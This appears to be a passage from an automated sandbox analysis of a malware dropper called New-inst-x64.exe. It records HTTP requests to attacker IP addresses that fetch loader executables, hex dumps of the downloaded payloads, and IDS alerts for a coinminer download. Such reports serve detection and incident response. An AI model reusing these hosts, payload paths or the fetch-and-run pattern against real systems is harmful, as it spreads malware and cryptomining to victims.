e2 12 ee f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 18 07 00 00 a2 00 00 00 00 00 00 47 3c 18 00 00 10 00 00 00 30 07 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 40 00 00 04 00 00 62 dc 3d 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 f0 07 00 dc 00 00 00 00 a0 07 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 5c 17 07 00 00 10 00 00 00 1e 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 b4 56 00 00 00 30 07 00 00 28 00 00 00 22 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 1e 0d 00 00 00 90 07 00 00 02 00 00 00 4a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 00 00 00 00 a0 07 00 00 02 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 24 38 00 00 00 b0 07 00 00 1a 00 00 00 4e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 64 61 74 61 00 00 00 10 00 00 00 f0 07 00 00 02 00 00 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 68 65 6d 69 64 61 00 40 38 00 00 00 08 00 00 40 38 00 00 6a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 09:31:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 17:35:05 GMTETag: "15600-63028a03aa5c5"Accept-Ranges: bytesContent-Length: 87552Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d af d5 a9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 48 01 00 00 0c 00 00 00 00 00 00 be 67 01 00 00 20 00 00 00 80 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 67 01 00 57 00 00 00 00 80 01 00 99 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 47 01 00 00 20 00 00 00 48 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 99 08 00 00 00 80 01 00 00 0a 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 01 00 00 02 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 67 01 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 64 00 00 d8 02 01 00 01 00 00 00 36 01 00 06 70 64 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 02 00 00 00 90 77 53 de 00 00 00 00 49 44 41 54 90 db 7d 47 00 00 00 00 49 45 4e 44 ae 42 60 82 00 00 00 1e 02 28 57 00 00 0a 2a 1b 30 04 00 fa 01 00 00 01 00 00 11 00 02 28 ce 00 00 06 0a 20 d1 08 14 a7 20 0f 1b 98 9d 61 25 13 07 1c 5e 45 06 00 00 00 52 00 00 00 2b 00 00 00 3c 00 00 00 d3 ff ff ff 02 00 00 00 18 00 00 00 2b 50 7e 11 00 00 0a 0b 11 07 20 38 be d9 42 5a 20 00 c5 ce 1a 61 2b c0 06 2c 28 11 07 20 bf 65 c0 c6 5a 20 76 9e e6 dc 61 2b ad 00 11 07 20 eb 3f 61 2e 5a 20 c6 b6 cd b4 61 2b 9c 06 8e 16 fe 03 2b 01 16 0c 08 39 6d 01 00 00 20 c6 aa 61 8e 2b 86 06 28 cf 00 00 06 0d 09 16 28 d0 00 00 06 13 04 11 04 28 d1 00 00 06 13 05 00 20 65 65 48 91 20 0f 1b 98 9d 61 25 13 07 19 5e 45 03 00 00 00 df ff ff ff 1b 00 00 00 02 00 00 00 2b 19 11 05 28 d2 00 00 06 0b 00 11 07 20 fa 57 9f df 5a 20 1f 58 7d c8 61 2b c9 de 54 11 05 2c 4f 20 22 3d 85 e7 20 0f 1b 9
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 09:32:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 17:35:06 GMTETag: "6b200-63028a047c524"Accept-Ranges: bytesContent-Length: 438784Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 28 d4 c9 86 9d e1 22 6b 0a cf d6 90 8e 26 40 db d0 de a5 c8 32 ba 48 42 b5 63 24 1f bc e4 56 92 d8 a1 3c 1a b4 c9 58 58 1f 3e bf 88 be c5 8e b4 c2 f8 85 e7 4c 1b 91 93 a7 16 00 01 00 00 0b 51 d1 00 94 c1 a0 f0 94 9a c9 35 4c f4 a7 89 67 78 cb 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 73 c5 d1 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d ed 88 04 00 04 38 03 00 00 30 00 00 80 e4 03 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 04 00 00 99 fb 06 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 03 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c e4 03 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 d1 03 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 5d 02 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 dc e9 00 00 00 70 02 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 cc 21 00 00 00 60 03 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 30 00 00 00 90 03 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 02 00 00 00 00 00 00 00 00 fc 00 00 00 00 c0 03 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 60 2b 02 00 00 d0 03 00 00 2c 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: GET /api/or4yk1zqaf HTTP/1.1Host: 185.170.153.104:3000Connection: close
      Source: global trafficHTTP traffic detected: GET /api/or4yk1zqaf HTTP/1.1Host: 5.252.153.122:3000Connection: close
      Source: global trafficHTTP traffic detected: GET /loader/29/file.exe HTTP/1.1Host: 138.124.55.36Connection: close
      Source: global trafficHTTP traffic detected: GET /loader/1/file1.exe HTTP/1.1Host: 138.124.55.36Connection: close
      Source: global trafficHTTP traffic detected: GET /loader/1/file2.exe HTTP/1.1Host: 138.124.55.36Connection: close
      Source: global trafficHTTP traffic detected: GET /loader/1/file3.exe HTTP/1.1Host: 138.124.55.36Connection: close
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49727 -> 147.45.124.241:80
      Source: Network trafficSuricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.4:49727 -> 147.45.124.241:80
      Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
      Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
      Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
      Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
      Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
      Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
      Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
      Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
      Source: unknownTCP traffic detected without corresponding DNS query: 5.252.153.122
      Source: unknownTCP traffic detected without corresponding DNS query: 185.170.153.104
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 138.124.55.36
      Source: global trafficHTTP traffic detected: GET /api/or4yk1zqaf HTTP/1.1Host: 185.170.153.104:3000Connection: close
      Source: global trafficHTTP traffic detected: GET /api/or4yk1zqaf HTTP/1.1Host: 5.252.153.122:3000Connection: close
      Source: global trafficHTTP traffic detected: GET /loader/29/file.exe HTTP/1.1Host: 138.124.55.36Connection: close
      Source: global trafficHTTP traffic detected: GET /loader/1/file1.exe HTTP/1.1Host: 138.124.55.36Connection: close
      Source: global trafficHTTP traffic detected: GET /loader/1/file2.exe HTTP/1.1Host: 138.124.55.36Connection: close
      Source: global trafficHTTP traffic detected: GET /loader/1/file3.exe HTTP/1.1Host: 138.124.55.36Connection: close
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://narwhaljs.org)
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://userguide.icu-project.org/strings/properties
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.000000000266D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10201
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10704
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#clear
      Source: New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count-map
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#countreset
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://console.spec.whatwg.org/#table
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://crbug.com/v8/7848
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7231#section-6.4
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7238
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/SpiderMonkey/Parser_API
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/PerformanceResourceTiming
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
      Source: svchost.exe, 00000012.00000003.1402558604.0000020E2E454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
      Source: svchost.exe, 00000012.00000003.1402558604.0000020E2E454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#fetch-timing-info
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/WICG/scheduling-apis
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js#L23
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/issues/575
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/addaleax/eventemitter-asyncresource
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/antirez/linenoise
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000003.1175991867.0000000009A46000.00000004.00000020.00020000.00000000.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chalk/supports-color
      Source: New-inst-x64.exe, 00000000.00000000.1171874817.00000000010A6000.00000002.00000001.01000000.00000003.sdmp, New-inst-x64.exe, 00000000.00000001.1176020418.00000000010A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
